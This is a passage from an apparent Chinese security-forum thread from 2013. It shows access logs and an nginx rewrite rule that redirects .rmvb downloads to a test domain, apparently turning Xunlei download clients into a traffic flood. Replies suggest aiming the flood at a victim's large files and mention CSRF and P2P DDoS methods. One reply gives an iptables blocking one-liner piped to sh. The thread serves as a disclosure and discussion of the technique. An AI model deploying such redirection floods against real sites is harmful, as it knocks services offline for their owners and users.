111.172.197.39 - - [24/May/2013:22:08:16 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
117.92.169.209 - - [24/May/2013:22:08:18 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C)"
218.79.60.165 - - [24/May/2013:22:08:20 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
114.83.89.180 - - [24/May/2013:22:08:21 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
219.150.151.4 - - [24/May/2013:22:08:23 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
14.117.194.204 - - [24/May/2013:22:08:23 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)"
183.156.53.206 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
113.89.97.65 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"
14.153.144.182 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
113.89.97.65 - - [24/May/2013:22:08:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"
180.157.86.134 - - [24/May/2013:22:08:25 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
113.89.97.65 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"
61.171.115.42 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
118.213.174.214 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
113.89.97.65 - - [24/May/2013:22:08:29 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"
58.19.214.162 - - [24/May/2013:22:08:29 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0"
113.89.97.65 - - [24/May/2013:22:08:30 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"
120.33.63.134 - - [24/May/2013:22:08:31 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
180.108.186.183 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
183.156.53.206 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
218.11.176.18 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
113.89.97.65 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"
113.89.97.65 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)"
58.209.237.174 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
58.212.102.13 - - [24/May/2013:22:08:35 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"
58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"
58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"
218.31.5.235 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 718)"
58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"
58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"
183.25.17.231 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
183.156.53.206 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
222.75.204.224 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"
58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)"
61.171.115.42 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
112.102.189.170 - - [24/May/2013:22:08:39 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
183.156.53.206 - - [24/May/2013:22:08:41 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
8\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-24 22:10
此时规则如下。
location ~\* \\.(rmvb)$ {
rewrite ^/ http://test.wooyun.imlonghao.com/?xl;
}
9\#
/fd (/proc) ?() \| 2013-05-24 22:10
牛B
10\#
xsser (十根阳具有长短!!) \| 2013-05-24 22:14
我日... 这个量还挺大
11\#
leaf \| 2013-05-24 22:20
好思路!
12\#
docall (陈公子是也。。。) \| 2013-05-24 22:22
going down!贱心快找护舒宝赞助吧!
13\#
斯文的鸡蛋 (有图有jb... 但有jb不一定有真相) \| 2013-05-24 22:33
真特么淫荡
14\#
L.N. (张飞+曹操) \| 2013-05-24 22:52
真心淫荡
15\#
Mujj (找个玩渗透网站的、教我玩渗透、我给他8位qq和情侣) \| 2013-05-24 23:02
cat wooyun.org.log \| grep '符合规则的' \| awk '{print "iptables -I INPUT -p tcp --dport 80 -s ", $1, "-j DROP"}'\| sort -n \| uniq \| sh
16\#
x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) \| 2013-05-24 23:02
好思路啊.顶
17\#
LittlePig (</html>) \| 2013-05-25 00:13
可以扔猥琐流了…
18\#
livers (如梦似幻) \| 2013-05-25 11:41
@imlonghao 自伤800啊
19\#
虚云 \| 2013-05-25 12:09
你rewrite得起么,想杀死别人,前提是你自己血多。
@livers
中肯!
20\#
虚云 \| 2013-05-25 12:10
不过思路确实值得赞一下,如果在某些可以上传并发布地址的空间放一个热门大片,后果不堪设想。
21\#
z7y (我是z7y,我为小胖子代言!!) \| 2013-05-25 12:31
超赞.... 扔猥琐流去吧~ @xsser
22\#
insight-labs (Root Yourself in Success) \| 2013-05-25 12:42
@虚云 如果能在对方网站上找到一个耗资源或者流量的链接,比如一个大文件。rewrite过去成本很低
23\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-25 13:00
@虚云 @livers
观察只是rewrite的话,对自己没怎么伤...
像@insight-labs 所说的那样,对面有一个很大的文件,完全可以rewrite过去。
要注意,发起的这个链接是会去下载的..
24\#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) \| 2013-05-25 14:36
说到流量转发攻击,其实有更简单更高效的,直接去百度贴吧访问量大的帖子里:
详见:【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息,你懂的……
25\#
萧然 (喜欢一切美的东西·) \| 2013-05-25 14:41
@核攻击 哇 这也可以?以前拿这种刷移动的推广 搞了个第一名 奖了个手机
26\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-25 14:48
@核攻击 要D8要是能占据首页的话。。。。
27\#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) \| 2013-05-25 14:49
说起来云资源攻击,前些年有人曾伪装p2p热门资源发起巨型纯流量攻击……
28\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-25 14:57
@核攻击 有地址看看么?
29\#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) \| 2013-05-25 15:07
@imlonghao 利用P2P网络发动大规模、大流量DDOS攻击
30\#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) \| 2013-05-25 15:18
@萧然 详见:【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息
31\#
CHForce (带马师) \| 2013-05-25 15:58
一楼比一楼给力,招数越来越犀利
32\#
happytree ("如果我死了,请吃掉我吧") \| 2013-05-25 16:02
雅蠛蝶~太口怕了
33\#
廷廷 (想法最重要) \| 2013-05-25 16:16
@核攻击 果断学习啦!!!
34\#
小森森 \| 2013-05-25 17:44
赞一个~~不过……你自己网站也会很卡诶~
35\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-25 18:08
@小森森 http://imlonghao.com 现在仍有这种情况,但是你觉得卡么?
36\#
Mujj (找个玩渗透网站的、教我玩渗透、我给他8位qq和情侣) \| 2013-05-25 18:52
@imlonghao 重写消耗的是CPU资源,不过也消不了多少。
37\#
whking \| 2013-05-25 19:56
@imlonghao 前几天你网站挂了,我以为你不开了的呢。
38\#
imlonghao (imlonghao.com 友情链接) \| 2013-05-25 20:32
@whking -.-\#\#
39\#
GaRY \| 2013-05-26 00:45
好帖子!绝对精华。目前对这个方面进行ddos的技术不是没人想过,但是都没有实例化阶段。楼主这个帖子算是头一个了AFAIK。
40\#
xsser (十根阳具有长短!!) \| 2013-05-26 11:32
@livers 对洞主自己来说,这个应该只需要耗费重写的,但是对于目标来说可能还要过数据库......
41\#
小森森 \| 2013-05-26 14:56
@imlonghao 不卡。。但是上不去啊……
42\#
蟋蟀哥哥 (popok是孙子!![just for fun]) \| 2013-05-26 15:51
精华帖子了
hang \| 2013-05-26 20:34
想到这个了,vessial在poc2011上面的演讲PPT
[Xunlei\_Network\_Internal\_for\_PoC2011.pdf](https://pan.baidu.com/share/link?shareid=446419uk=771752861)